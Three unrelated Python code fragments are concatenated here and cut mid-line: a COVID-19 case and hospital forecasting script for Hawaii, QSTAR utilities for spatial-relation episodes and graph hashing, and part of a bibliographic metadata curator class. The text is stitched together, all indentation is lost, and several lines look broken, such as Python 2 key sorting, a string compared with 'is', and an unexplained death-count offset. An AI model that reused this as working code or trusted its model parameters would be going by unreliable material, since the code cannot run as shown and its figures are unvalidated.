from functions.functions import ndays, rt_ndays, infected_travelers, run_model, add_reported_new_cases, get_active_cases, insert_active_cases, get_start_date_index, load_hdc_data, create_bokeh_graph_df
from functions.visualizations import initialize_plotting_function, forecast_graph, create_forecast_graphs, create_oahu_reopening_graph_plotly, create_case_situation_graph, create_positivity_situation_graph
#########################################################
################### ~ Load Dfs ~ ########################
#########################################################
# Formats dates to reflect the following example: 9/7/2020 or 2020-9-7 (# or - represents removing 0s)
# format_date_str = "%#m/%#d/%Y" # PC
format_date_str = "%-m/%-d/%Y" # Mac/Linux
# Load COVID data from HDC (scraped from DOH)
hdc_covid_data_df = get_hdc_covid_data()
#########################################################
##################### ~ Set Dates ~ #####################
#########################################################
# Used for JSON update due to potential lag from today's date to model begin (resulting from covidtracking.org not updating until 1pm)
todays_date = str(datetime.now().strftime(format_date_str))
# Use for CSV creation
todays_date_f_string = todays_date.replace('/', '.')
# Set's 'today' (when the forecast output begins based on available historic data) - used to initialize start of the forecast
data_lag = 0
if list(hdc_covid_data_df['Date'])[-1] != todays_date:
# sets the 'today' to the beginning of historic data start to ensure no data gap
data_lag = (pd.to_datetime(todays_date) - list(hdc_covid_data_df['Date'])[-1]).days
else:
data_lag = 0
today = str((datetime.now() - timedelta(days = data_lag)).strftime(format_date_str))
# Set initialization days and length of the forecast (recommend keeping consistent and only change situationally for specific scenarios)
initialization_days = 15
forecast_length = 13
Model_Begin = str((datetime.now() - timedelta(days = initialization_days)).strftime(format_date_str))
Model_End = str((datetime.now() - timedelta(days = -forecast_length)).strftime(format_date_str))
# Calculates time difference between model start and current date (used in data cleaning function)
ndays_today_Model_Begin = (ndays(Model_Begin, today))
#########################################################
################# ~ Set Parameters ~ ####################
#########################################################
# Model parameters used to move from Reported New Cases to Estimated Number of Initial Infections
shift_days = 7
cases_scale = 7
# Populations:
oahu = 953207
all_islands = 1415872
# Set Rt values for initalization, pessimistic, and expected scenarios
rt_initialization = 2.0
rt_estimate_pessimistic = 1.04
rt_estimate_expected = 1.00
# Set parameters
incubation = 3
infectious_duration = 6
delay = 3
hosp_stay = 7
ICU_stay = 10
hospitalization_rate = 0.0118
hospitalization_ICU_rate = 0.197
ICU_hosp_rate = 0.001
# Set [Exposed, Infected] travelers for each day in respective range of dates
travel_values = [[4, 0], # rt_initialization - rt_estimate
[3, 0]] # rt_estimate - Model_End
# Set how much historical data is included in df & number of rolling days for reported new cases average
historical_days = 30
rolling_mean_days = 7
# Set how many days of Reported New Cases are summed to get the Active Cases for Quarantine
rolling_sum_days = 14
#########################################################
##### ~ Get Values for Initial Compartment Vector ~ #####
#########################################################
def loop_through_model():
# To start calculation for Estimated Number of Initial Infections,
# get the first day in day range equal to range of duration of infectious period,
# which when summed will account for total persons in the I compartment (infected) based on the Model Begin date
start_index = [e for e, i in enumerate(hdc_covid_data_df['Date']) if i == pd.to_datetime(Model_Begin) + timedelta(shift_days - infectious_duration)][0]
# Sum Reported New Cases for duration of infection,
# then scale by the cases_scale factor to estimate true number of infected.
initial_infections = hdc_covid_data_df[start_index : start_index + (infectious_duration + 1)]['Cases'].sum() * cases_scale
# Get initial values from historical data for hospitalizations, ICU, and deaths
initial_hospitalizations = int(hdc_covid_data_df['Hospitalizations'][hdc_covid_data_df['Date'] == pd.to_datetime(Model_Begin)])
initial_ICU = int(hdc_covid_data_df['ICU'][hdc_covid_data_df['Date'] == Model_Begin])
initial_Deaths = int(hdc_covid_data_df['Deaths'][hdc_covid_data_df['Date'] == Model_Begin]) + -4
#########################################################
#################### ~ Run Model ~ ######################
#########################################################
# Date Rt for pessimistic / expected begins. Starts ~1 week prior to today's date to smooth curve
rt_estimate_start = str((datetime.now() - timedelta(days = 9)).strftime(format_date_str))
# Run pessimistic & expected scenarios
pessimistic_14 = run_model([Model_Begin, Model_End, initial_hospitalizations, initial_ICU, initial_Deaths, all_islands, initial_infections, incubation, infectious_duration, delay, hosp_stay, ICU_stay, hospitalization_rate, hospitalization_ICU_rate, ICU_hosp_rate], # Select which population to use in simulation
[Model_Begin, rt_estimate_start], # Dates for Rt changes
[rt_initialization, rt_estimate_pessimistic], # Rt values beginning on above dates
travel_values,
all_islands,
Model_End)
expected_14 = run_model([Model_Begin, Model_End, initial_hospitalizations, initial_ICU, initial_Deaths, all_islands, initial_infections, incubation, infectious_duration, delay, hosp_stay, ICU_stay, hospitalization_rate, hospitalization_ICU_rate, ICU_hosp_rate],
[Model_Begin, rt_estimate_start],
[rt_initialization, rt_estimate_expected],
travel_values,
all_islands,
Model_End)
############# ~ Add Reported New Cases ~ ################
# Run add_reported_new_cases for both scenarios
pessimistic_14 = add_reported_new_cases('Pessimistic', pessimistic_14, shift_days, cases_scale, ndays_today_Model_Begin)
expected_14 = add_reported_new_cases('Expected', expected_14, shift_days, cases_scale, ndays_today_Model_Begin)
#########################################################
################# ~ Add Active Cases ~ ##################
#########################################################
# Run get_active_cases for both scenarios
pessimistic_active = get_active_cases(pessimistic_14, hdc_covid_data_df, 'Pessimistic', rolling_sum_days)
expected_active = get_active_cases(expected_14, hdc_covid_data_df, 'Expected', rolling_sum_days)
# Add active cases to forecast dfs
# expected_14['Active_Cases'] = expected_active['Active_Cases'][-len(expected_14.index):].values
# pessimistic_14['Active_Cases'] = pessimistic_active['Active_Cases'][-len(pessimistic_14.index):].values
insert_active_cases(expected_14, expected_active)
insert_active_cases(pessimistic_14, pessimistic_active)
return expected_14, pessimistic_14, expected_active, pessimistic_active
#########################################################
########## ~ Create Forecast Graphs (Bokeh) ~ ###########
#########################################################
# first run for initialization
expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
# Create df for graphs
hdc_covid_data_df_historical_graph, active_historical = create_bokeh_graph_df(hdc_covid_data_df, rolling_mean_days, historical_days, pessimistic_active)
# parameter optimization test
latest_cases, latest_hospitalizations, latest_ICU, latest_deaths = list(hdc_covid_data_df_historical_graph['Reported_New_Cases'])[-1], list(hdc_covid_data_df_historical_graph['Hospitalizations'])[-1], list(hdc_covid_data_df_historical_graph['ICU'])[-1], list(hdc_covid_data_df_historical_graph['Deaths'])[-1]
first_day_forecast_cases, first_day_forecast_hospitalizations, first_day_forecast_ICU, first_day_forecast_deaths = list(expected_14['Reported_New_Cases'])[0], list(expected_14['Hospitalizations'])[0], list(expected_14['ICU'])[0], list(expected_14['Deaths'])[0]
latest_list = [latest_cases, latest_hospitalizations, latest_ICU, latest_deaths]
first_day_forecast_list = [first_day_forecast_cases, first_day_forecast_hospitalizations, first_day_forecast_ICU, first_day_forecast_deaths]
for i, (latest, first_day_forecast) in enumerate(zip(latest_list, first_day_forecast_list)):
print("Current variable: " + str(latest))
if 0.995 < (latest / first_day_forecast) < 1.005:
continue
while (0.995 > (latest / first_day_forecast)) or ((latest / first_day_forecast) > 1.005):
if (latest / first_day_forecast) < 1:
if i == 0:
rt_initialization = rt_initialization - (rt_initialization * 0.01)
expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
first_day_forecast = list(expected_14['Reported_New_Cases'])[0]
if i == 1:
hospitalization_rate = hospitalization_rate - (hospitalization_rate * 0.01)
expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
first_day_forecast = list(expected_14['Hospitalizations'])[0]
if i == 2:
hospitalization_ICU_rate = hospitalization_ICU_rate - (hospitalization_ICU_rate * 0.01)
expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
first_day_forecast = list(expected_14['ICU'])[0]
if i == 3:
ICU_hosp_rate = ICU_hosp_rate - (ICU_hosp_rate * 0.01)
expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
first_day_forecast = list(expected_14['Deaths'])[0]
print(' < 1: ' + str(latest / first_day_forecast))
elif (latest / first_day_forecast) > 1:
if i == 0:
rt_initialization = rt_initialization + (rt_initialization * 0.01)
expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
first_day_forecast = list(expected_14['Reported_New_Cases'])[0]
if i == 1:
hospitalization_rate = hospitalization_rate + (hospitalization_rate * 0.01)
expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
first_day_forecast = list(expected_14['Hospitalizations'])[0]
if i == 2:
hospitalization_ICU_rate = hospitalization_ICU_rate + (hospitalization_ICU_rate * 0.01)
expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
first_day_forecast = list(expected_14['ICU'])[0]
if i == 3:
ICU_hosp_rate = ICU_hosp_rate + (ICU_hosp_rate * 0.01)
expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
first_day_forecast = list(expected_14['Deaths'])[0]
print(' > 1: ' + str(latest / first_day_forecast))
print('Rt_Initialization: ' + str(rt_initialization))
print('Hospital Flow Rate: ' + str(hospitalization_rate))
print('ICU Flow Rate: ' + str(hospitalization_ICU_rate))
print('Death Flow Rate: ' + str(ICU_hosp_rate))
# Set Y axis max
max_hosp = pd.concat([pessimistic_14['Hospitalizations'], hdc_covid_data_df_historical_graph['Hospitalizations']]).astype(int).max() * 1.1
max_ICU = pd.concat([pessimistic_14['ICU'], hdc_covid_data_df_historical_graph['ICU']]).astype(int).max() * 1.1
max_Deaths = pd.concat([pessimistic_14['Deaths'], hdc_covid_data_df_historical_graph['Deaths']]).astype(int).max() * 1.5
max_Reported_New_Cases = pd.concat([pessimistic_14['Reported_New_Cases'], hdc_covid_data_df_historical_graph['Reported_New_Cases']]).astype(int).max() * 1.1
max_Active_Cases = pd.concat([pessimistic_active['Active_Cases'][-15:], active_historical['Active_Cases']]).astype(int).max() * 1.1
# Display forecast graphs
show(forecast_graph(pessimistic_14, expected_14, hdc_covid_data_df_historical_graph, max_hosp, max_ICU, max_Deaths, max_Reported_New_Cases))
#########################################################
######### ~ Create Forecast Graphs (Plotly) ~ ###########
#########################################################
# Change push_to_site to 'Y' if you want the forecasts live, otherwise use 'N' to view in IDE for QA
push_to_site = 'N'
# create_forecast_graphs(cdc_metric, df, df_column, expected_14, pessimistic_14, legend_name, max_metric, chart_studio_name)
create_forecast_graphs('case', hdc_covid_data_df_historical_graph, 'Reported_New_Cases', expected_14, pessimistic_14, 'Cases', max_Reported_New_Cases, 'cases', push_to_site)
create_forecast_graphs('death', hdc_covid_data_df_historical_graph, 'Deaths', expected_14, pessimistic_14, 'Deaths', max_Deaths, 'death', push_to_site)
create_forecast_graphs('active_cases', active_historical, 'Active_Cases', expected_14, pessimistic_14, 'Active Cases', max_Active_Cases, 'active_cases', push_to_site)
create_forecast_graphs('', hdc_covid_data_df_historical_graph, 'Hospitalizations', expected_14, pessimistic_14, 'Hospitalizations', max_hosp, 'hospitalizations', push_to_site)
create_forecast_graphs('', hdc_covid_data_df_historical_graph, 'ICU', expected_14, pessimistic_14, 'ICU', max_ICU, 'ICU', push_to_site)
#########################################################
######## ~ Create Oahu Tier Graph (Plotly) ~ ############
#########################################################
oahu_7_day_avg_cases = [93, 73, 68.7, 80, 49, 71, 81, 71, 84, 60, 72, 89, 83, 62, 88, 130, 86, 83, 59, 52, 33, 28, 22, 27, 30, 40, 58]
oahu_7_day_avg_cases_color = ['orange', 'orange', 'orange', 'orange', 'gold', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange','gold', 'gold', 'gold', 'gold', 'gold', 'gold', 'orange']
oahu_test_positivity_rate = [0.04, 0.032, 0.034, 0.023, 0.02, 0.027, 0.031, 0.027, 0.025, 0.021, 0.022, 0.031, 0.028, 0.029, 0.042, 0.040, 0.031, 0.031, 0.024, 0.020, 0.013, 0.011, 0.009, 0.01, 0.01, 0.015, 0.022]
oahu_test_positivity_rate_color = ['orange', 'orange', 'orange', 'gold', 'gold', 'orange', 'orange', 'orange', 'orange', 'gold', 'gold', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'gold', 'gold', 'gold', 'gold', 'lightgreen', 'gold', 'gold','gold', 'gold', 'orange']
oahu_dates = ['9/30', '10/7', '10/14', '10/21', '10/28', '11/04', '11/11', '11/18', '11/25', '12/02', '12/09', '12/16', '12/23', '12/30', '1/06', '1/13', '1/20', '1/27', '2/3', '2/10', '2/17', '2/24', '3/3', '3/10', '3/17', '3/24', '3/31']
push_to_site_oahu = 'N'
create_oahu_reopening_graph_plotly(oahu_7_day_avg_cases, oahu_test_positivity_rate, oahu_dates, oahu_7_day_avg_cases_color, oahu_test_positivity_rate_color, | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""QSTAR Utilities
"""
from __future__ import print_function
from itertools import combinations, permutations
import copy, sys
from igraph import Graph as iGraph
import numpy as np
import warnings
import qstag
def compute_episodes(world_qsr):
"""
Compute QSR Episodes from a QSRLib.QSR_World_Trace object.
QSR Episodes compresses repeating QSRs into a temporal interval over which they hold.
Returns: a long list of episodes with the format, `[(objects), {spatial relations}, (start_frame, end_frame)]`.
FILTERS: if any of the qsr values == Ignore, the entire episode will be ignored.
Example content:
----------------
o1,mug,o2,hand,sur,3,7
o1,mug,o3,head,con,4,9
o2,hand,o3,head,dis,1,9
----------------
..seealso:: For further details about QSR Episodes, refer to its :doc:`description. <../handwritten/qsrs/qstag/>`
:param world_qsr: The QSR_World_Trace object (QSRlib_Response_Message)
:type world_qsr: :class:`World_QSR_Trace <qsrlib_io.world_qsr_trace>`
"""
episodes = []
obj_based_qsr_world = {}
frames = world_qsr.get_sorted_timestamps()
"""remove the first frame which cannot contain a qtcb relation"""
if "qtcbs" in world_qsr.qsr_type:
if frames[0] == 1.0: frames.pop(0)
for frame in frames:
for objs, qsrs in world_qsr.trace[frame].qsrs.items():
my_qsrs = {}
#print("h", objs, qsrs.qsr)
for qsr_key, qsr_val in qsrs.qsr.items():
#print(" ", qsr_key, qsr_val)
if qsr_key is "tpcc":
origin,relatum,datum = objs.split(',')
new_key=("%s-%s,%s") % (origin,relatum,datum)
try:
obj_based_qsr_world[new_key].append((frame, {"tpcc": qsrs.qsr["tpcc"]}))
except KeyError:
obj_based_qsr_world[new_key] = [(frame, {"tpcc": qsrs.qsr["tpcc"]})]
else:
my_qsrs[qsr_key] = qsr_val
if my_qsrs != {}:
try:
obj_based_qsr_world[objs].append((frame, my_qsrs))
except KeyError:
obj_based_qsr_world[objs] = [(frame, my_qsrs)]
#print("s", obj_based_qsr_world[objs])
for objs, frame_tuples in obj_based_qsr_world.items():
epi_start, epi_rel = frame_tuples[0]
epi_end = copy.copy(epi_start)
objects = objs.split(',')
for (frame, rel) in frame_tuples:
if rel == epi_rel:
epi_end = frame
else:
episodes.append( (objects, epi_rel, (epi_start, epi_end)) )
epi_start = epi_end = frame
epi_rel = rel
episodes.append((objects, epi_rel, (epi_start, epi_end)))
"""If any of the qsr values == ignore. Remove that episode entirely. """
filtered_out_ignore = []
for ep in episodes:
ignore_flag = 0
for qsr, val in ep[1].items():
if val == "Ignore": ignore_flag = 1
if ignore_flag == 0: filtered_out_ignore.append(ep)
#print("number of eps:", len(filtered_out_ignore)) # MY CODE: COMMENTED IT OUT
return filtered_out_ignore
def get_E_set(objects, spatial_data):
"""Returns the Starting episode set (E_s) and the Endding episode set (E_s)
See Sridar_AAAI_2010 for more details
:param objects: object dictionary with name as key, and node ID as value
:type objects: dictionary
:param spatial_data: A list of tuples, where a tuple contains a list of objects, a spatial relation node ID, and a duration of time.
:type spatial_data: list
:return: A tuple containing two sets of QSR Episodes, where a temporal node does not hold beteen Episodes in the same set.
:rtype: tuple
"""
objects_ids = objects.values()
start, end = {}, {}
E_s, E_f = [], []
number_of_objects = len(spatial_data[0][0])
for possible_ids in permutations(objects_ids, number_of_objects):
added=0
for epi in spatial_data:
ep_objects = epi[0]
frame_window = epi[2]
#if (objects[0] == obj1 and objects[1] == obj2):
if list(possible_ids) == ep_objects:
start[frame_window[0]] = epi
end[frame_window[1]] = epi
added=1
if added == 1:
st=start.keys()
st.sort()
E_s.append(start[st[0]])
en=end.keys()
en.sort()
E_f.append(end[en[-1]])
return E_s, E_f
def get_allen_relation(duration1, duration2):
"""Generates an Allen interval algebra relation between two discrete durations of time
:param duration1: First duration of time (start_frame, end_frame)
:type duration1: tuple
:param duration2: Second duration of time (start_frame, end_frame)
:type duration2: tuple
"""
is1, ie1 = duration1
is2, ie2 = duration2
if is2-1 == ie1:
return 'm'
elif is1-1 == ie2:
return 'mi'
# elif is1 == is2 and ie1 == ie2:
# return '='
elif is2 > ie1:
return '<'
elif is1 > ie2:
return '>'
### I INCLUDED THIS !!
else:
return 'o'
# elif ie1 >= is2 and ie1 < ie2 and is1 < is2:
# return 'o'
# elif ie2 >= is1 and ie2 < ie1 and is2 < is1:
# return 'oi'
# elif is1 > is2 and ie1 < ie2:
# return 'd'
# elif is1 < is2 and ie1 > ie2:
# return 'di'
# elif is1 == is2 and ie1 < ie2:
# return 's'
# elif is1 == is2 and ie1 > ie2:
# return 'si'
# elif ie1 == ie2 and is2 < is1:
# return 'f'
# elif ie1 == ie2 and is2 > is1:
# return 'fi'
def graph_hash(G, node_name_attribute='name', edge_name_attribute=None):
"""
See Figure 4 in 'kLog: A Language for Logical and Relational Learning with Kernels'
for the algorithm.
Takes an igraph graph, node_name attribute and edge_name_attribute. Note that
edge_name_attribute is optional i.e. for graphs without edge labels or to ignore edge labels,
edge_name_attribute is None.
"""
# suppress Runtime Warnings regarding not being able to find a path through the graphs
warnings.filterwarnings('ignore')
for node in G.vs:
paths = G.get_shortest_paths(node)
node_hashes = []
for path in paths:
if len(path) != 0:
node_name = G.vs[path[-1]][node_name_attribute]
if node_name == None:
node_name = repr(None)
node_hashes.append((len(path), node_name))
node_hashes.sort()
node_hashes_string = ':'.join([repr(i) for i in node_hashes])
node['hash_name'] = hash(node_hashes_string)
warnings.filterwarnings('always')
if edge_name_attribute:
edge_hashes = [(G.vs[edge.source]['hash_name'], G.vs[edge.target]['hash_name'],\
edge[edge_name_attribute]) for edge in G.es]
else:
edge_hashes = [(G.vs[edge.source]['hash_name'], G.vs[edge.target]['hash_name'])\
for edge in G.es]
edge_hashes.sort()
edge_hashes_string = ':'.join([repr(i) for i in edge_hashes])
return hash(edge_hashes_string)
def get_temporal_chords_from_episodes(episodes):
"""
Function returns temporal chords from a subset of episodes
:param episodes: a list of episodes, where one epiode has the format (start_frame, end_frame, id)
:type episodes: list
:return: list of chords
:rtype: list
"""
interval_data = {}
interval_breaks = []
# For each time point in the combined interval, get the state of the
# system which is just a list of relations active in that time point.
#todo: can this work with floats? Not unless there is a measure of unit.
for (s, e, id_) in episodes:
for i in range(int(s), int(e+1)):
if i not in interval_data:
interval_data[i] = []
interval_data[i].append(id_)
keys = interval_data.keys()
keys.sort()
# Now based on the state changes, break the combined interval
# whenever there is a change in the state
start = keys[0]
interval_value = interval_data[start]
for i in keys:
if interval_value == interval_data[i]:
end = i
continue
else:
interval_breaks.append([start, end, interval_value])
start = i
end = i
interval_value = interval_data[start]
else:
# Adding the final interval
interval_breaks.append([start, end, interval_value])
return interval_breaks
# -------------------------- MY CODE - MY FUNCTIONS -------------------------- #
def color_temporal_nodes(graph, dot_file):
# TKinter Color Chart: http://www.science.smith.edu/dftwiki/index.php/Color_Charts_for_TKinter
COLORS = ['snow', 'ghostwhite', 'whitesmoke', 'gainsboro', 'floralwhite',
'oldlace', 'linen', 'antiquewhite', 'papayawhip', 'blanchedalmond', 'bisque',
'peachpuff', 'navajowhite', 'lemonchiffon', 'mintream', 'azure', 'aliceblue',
'lavender', 'lavenderblush', 'mistyrose', 'darkslategray', 'dimgray', 'slategray',
'lightslategray', 'gray', 'lightgrey', 'midnightblue', 'navy', 'cornflowerblue',
'darkslateblue', 'slateblue', 'mediumslateblue', 'lightslateblue', 'mediumblue',
'royalblue', 'blue', 'dodgerblue', 'deepskyblue', 'skyblue', 'lightskyblue',
'steelblue', 'lightsteelblue', 'lightblue', 'powderblue', 'paleturquoise',
'darkturquoise', 'mediumturquoise', 'turquoise', 'cyan', 'lightcyan', 'cadetblue',
'mediumaquamarine', 'aquamarine', 'darkgreen', 'darkolive green', 'darkseagreen',
'seagreen', 'mediumseagreen', 'lightseagreen', 'palegreen', 'springgreen',
'lawngreen', 'mediumspringgreen', 'greenyellow', 'limegreen', 'yellowgreen',
'forestgreen', 'olivedrab', 'darkkhaki', 'khaki', 'palegoldenrod', 'lightgoldenrodyellow',
'lightyellow', 'yellow', 'gold', 'lightgoldenrod', 'goldenrod', 'darkgoldenrod',
'rosybrown', 'indianred', 'saddlebrown', 'sandybrown', 'darksalmon', 'salmon',
'lightsalmon', 'orange', 'darkorange', 'coral', 'lightcoral', 'tomato',
'orangered', 'red', 'hotpink', 'deeppink', 'pink', 'lightpink', 'palevioletred',
'maroon', 'mediumvioletred', 'violetred', 'mediumorchid', 'darkorchid',
'darkviolet', 'blueviolet', 'purple', 'mediumpurple', 'thistle', 'snow2',
'snow3', 'snow4', 'seashell2', 'seashell3', 'seashell4', 'AntiqueWhite1',
'AntiqueWhite2', 'AntiqueWhite3', 'AntiqueWhite4', 'bisque2', 'bisque3',
'bisque4', 'PeachPuff2', 'PeachPuff3', 'PeachPuff4', 'NavajoWhite2', 'NavajoWhite3',
'NavajoWhite4', 'LemonChiffon2', 'LemonChiffon3', 'LemonChiffon4', 'cornsilk2',
'cornsilk3', 'cornsilk4', 'ivory2', 'ivory3', 'ivory4', 'honeydew2', 'honeydew3',
'honeydew4', 'LavenderBlush2', 'LavenderBlush3', 'LavenderBlush4', 'MistyRose2',
'MistyRose3', 'MistyRose4', 'azure2', 'azure3', 'azure4', 'SlateBlue1',
'SlateBlue2', 'SlateBlue3', 'SlateBlue4', 'RoyalBlue1', 'RoyalBlue2', 'RoyalBlue3',
'RoyalBlue4', 'blue2', 'blue4', 'DodgerBlue2', 'DodgerBlue3', 'DodgerBlue4',
'SteelBlue1', 'SteelBlue2', 'SteelBlue3', 'SteelBlue4', 'DeepSkyBlue2',
'DeepSkyBlue3', 'DeepSkyBlue4', 'SkyBlue1', 'SkyBlue2', 'SkyBlue3', 'SkyBlue4',
'LightSkyBlue1', 'LightSkyBlue2', 'LightSkyBlue3', 'LightSkyBlue4', 'SlateGray1',
'SlateGray2', 'SlateGray3', 'SlateGray4', 'LightSteelBlue1', 'LightSteelBlue2',
'LightSteelBlue3', 'LightSteelBlue4', 'LightBlue1', 'LightBlue2', 'LightBlue3',
'LightBlue4', 'LightCyan2', 'LightCyan3', 'LightCyan4', 'PaleTurquoise1',
'PaleTurquoise2', 'PaleTurquoise3', 'PaleTurquoise4', 'CadetBlue1', 'CadetBlue2',
'CadetBlue3', 'CadetBlue4', 'turquoise1', 'turquoise2', 'turquoise3', 'turquoise4',
'cyan2', 'cyan3', 'cyan4', 'DarkSlateGray1', 'DarkSlateGray2', 'DarkSlateGray3',
'DarkSlateGray4', 'aquamarine2', 'aquamarine4', 'DarkSeaGreen1', 'DarkSeaGreen2',
'DarkSeaGreen3', 'DarkSeaGreen4', 'SeaGreen1', 'SeaGreen2', 'SeaGreen3',
'PaleGreen1', 'PaleGreen2', 'PaleGreen3', 'PaleGreen4', 'SpringGreen2',
'SpringGreen3', 'SpringGreen4', 'green2', 'green3', 'green4', 'chartreuse2',
'chartreuse3', 'chartreuse4', 'OliveDrab1', 'OliveDrab2', 'OliveDrab4',
'DarkOliveGreen1', 'DarkOliveGreen2', 'DarkOliveGreen3', 'DarkOliveGreen4',
'khaki1', 'khaki2', 'khaki3', 'khaki4', 'LightGoldenrod1', 'LightGoldenrod2',
'LightGoldenrod3', 'LightGoldenrod4', 'LightYellow2', 'LightYellow3', 'LightYellow4',
'yellow2', 'yellow3', 'yellow4', 'gold2', 'gold3', 'gold4', 'goldenrod1',
'goldenrod2', 'goldenrod3', 'goldenrod4', 'DarkGoldenrod1', 'DarkGoldenrod2',
'DarkGoldenrod3', 'DarkGoldenrod4', 'RosyBrown1', 'RosyBrown2', 'RosyBrown3',
'RosyBrown4', 'IndianRed1', 'IndianRed2', 'IndianRed3', 'IndianRed4', 'sienna1',
'sienna2', 'sienna3', 'sienna4', 'burlywood1', 'burlywood2', 'burlywood3',
'burlywood4', 'wheat1', 'wheat2', 'wheat3', 'wheat4', 'tan1', 'tan2', 'tan4',
'chocolate1', 'chocolate2', 'chocolate3', 'firebrick1', 'firebrick2', 'firebrick3',
'firebrick4', 'brown1', 'brown2', 'brown3', 'brown4', 'salmon1', 'salmon2',
'salmon3', 'salmon4', 'LightSalmon2', 'LightSalmon3', 'LightSalmon4', 'orange2',
'orange3', 'orange4', 'DarkOrange1', 'DarkOrange2', 'DarkOrange3', 'DarkOrange4',
'coral1', 'coral2', 'coral3', 'coral4', 'tomato2', 'tomato3', 'tomato4', 'OrangeRed2',
'OrangeRed3', 'OrangeRed4', 'red2', 'red3', 'red4', 'DeepPink2', 'DeepPink3',
'DeepPink4', 'HotPink1', 'HotPink2', 'HotPink3', 'HotPink4', 'pink1', 'pink2',
'pink3', 'pink4', 'LightPink1', 'LightPink2', 'LightPink3', 'LightPink4',
'PaleVioletRed1', 'PaleVioletRed2', 'PaleVioletRed3', 'PaleVioletRed4',
'maroon1', 'maroon2', 'maroon3', 'maroon4', 'VioletRed1', 'VioletRed2',
'VioletRed3', 'VioletRed4', 'magenta2', 'magenta3', 'magenta4', 'orchid1',
'orchid2', 'orchid3', 'orchid4', 'plum1', 'plum2', 'plum3', 'plum4', 'MediumOrchid1',
'MediumOrchid2', 'MediumOrchid3', 'MediumOrchid4', 'DarkOrchid1', 'DarkOrchid2',
'DarkOrchid3', 'DarkOrchid4', 'purple1', 'purple2', 'purple3', 'purple4',
'MediumPurple1', 'MediumPurple2', 'MediumPurple3', 'MediumPurple4', 'thistle1',
'thistle2', 'thistle3', 'thistle4', 'gray1', 'gray2', 'gray3', 'gray4', 'gray5',
'gray6', 'gray7', 'gray8', 'gray9', 'gray10', 'gray11', 'gray12', 'gray13',
'gray14', 'gray15', 'gray16', 'gray17', 'gray18', 'gray19', 'gray20', 'gray21',
'gray22', 'gray23', 'gray24', 'gray25', 'gray26', 'gray27', 'gray28', 'gray29',
'gray30', 'gray31', 'gray32', 'gray33', 'gray34', 'gray35', 'gray36', 'gray37',
'gray38', 'gray39', 'gray40', 'gray42', 'gray43', 'gray44', 'gray45', 'gray46',
'gray47', 'gray48', 'gray49', 'gray50', 'gray51', 'gray52', 'gray53', 'gray54',
'gray55', 'gray56', 'gray57', 'gray58', 'gray59', 'gray60', 'gray61', 'gray62',
'gray63', 'gray64', 'gray65', 'gray66', 'gray67', 'gray68', 'gray69', 'gray70',
'gray71', 'gray72', 'gray73', 'gray74', 'gray75', 'gray76', 'gray77', 'gray78',
'gray79', 'gray80', 'gray81', 'gray82', 'gray83', 'gray84', 'gray85', 'gray86',
'gray87', 'gray88', 'gray89', 'gray90', 'gray91', 'gray92', 'gray93', 'gray94',
'gray95', 'gray97', 'gray98', 'gray99']
# Find unique temporal relations.
temp_list = []
for o in graph.temporal_nodes:
temp_list.append(o['name'])
unique_temporal,unique_temp_counts = np.unique(temp_list, return_counts = True)
# Manager the color distribution depending on the unique temporal relations captured.
color = 40
which_color = []
for i in range(len(unique_temporal)):
which_color.append(COLORS[color])
color += 4
# Assign color to | |
"br/"
else:
pattern = "ra/"
metaid = ""
id_list = list(filter(None, id_list))
how_many_meta = [i for i in id_list if i.lower().startswith('meta')]
if len(how_many_meta) > 1:
for pos, elem in enumerate(id_list):
if "meta" in elem:
id_list[pos] = ""
else:
for pos, elem in enumerate(id_list):
try:
elem = Curator.string_fix(elem)
identifier = elem.split(":", 1)
value = identifier[1]
schema = identifier[0].lower()
if schema == "meta":
if "meta:" + pattern in elem:
metaid = value.replace(pattern, "")
else:
id_list[pos] = ""
else:
newid = schema + ":" + value
id_list[pos] = newid
except IndexError:
id_list[pos] = ""
if metaid:
id_list.remove("meta:" + pattern + metaid)
id_list = list(filter(None, id_list))
return id_list, metaid
def conflict(self, idslist, name, id_dict, col_name):
if col_name == "id" or col_name == "venue":
entity_dict = self.conflict_br
metaval = self.new_entity(entity_dict, name)
elif col_name == "author" or col_name == "editor" or col_name == "publisher":
entity_dict = self.conflict_ra
metaval = self.new_entity(entity_dict, name)
self.log[self.rowcnt][col_name]['Conflict Entity'] = metaval
for identifier in idslist:
entity_dict[metaval]["ids"].append(identifier)
if identifier not in id_dict:
ids = identifier.split(":")
found_m = self.finder.retrieve_id(ids[0], ids[1])
if found_m:
id_dict[identifier] = found_m
else:
count = self._add_number(self.id_info_path)
id_dict[identifier] = self.prefix + str(count)
return metaval
def finder_sparql(self, list2find, br=True, ra=False, vvi=False, publ=False):
match_elem = list()
id_set = set()
res = None
for elem in list2find:
if len(match_elem) < 2:
identifier = elem.split(":")
value = identifier[1]
schema = identifier[0]
if br:
res = self.finder.retrieve_br_from_id(value, schema)
elif ra:
res = self.finder.retrieve_ra_from_id(value, schema, publ)
if res:
for f in res:
if f[0] not in id_set:
match_elem.append(f)
id_set.add(f[0])
return match_elem
def ra_update(self, row, br_key, col_name):
if row[col_name]:
sequence = self.armeta[br_key][col_name]
ras_list = list()
for x, y in sequence:
ra_name = self.rameta[y]["title"]
ra_ids = " ".join(self.rameta[y]["ids"])
ra = ra_name + " [" + ra_ids + "]"
ras_list.append(ra)
row[col_name] = "; ".join(ras_list)
@staticmethod
def local_match(list2match, dict2match):
match_elem = dict()
match_elem["existing"] = list()
match_elem["wannabe"] = list()
for elem in list2match:
for k, va in dict2match.items():
if elem in va["ids"]:
if "wannabe" in k:
if k not in match_elem["wannabe"]:
match_elem["wannabe"].append(k)
else:
if k not in match_elem["existing"]:
match_elem["existing"].append(k)
return match_elem
def meta_ar(self, newkey, oldkey, role):
for x, k in self.ardict[oldkey][role]:
if "wannabe" in k:
for m in self.rameta:
if k in self.rameta[m]['others']:
new_v = m
break
else:
new_v = k
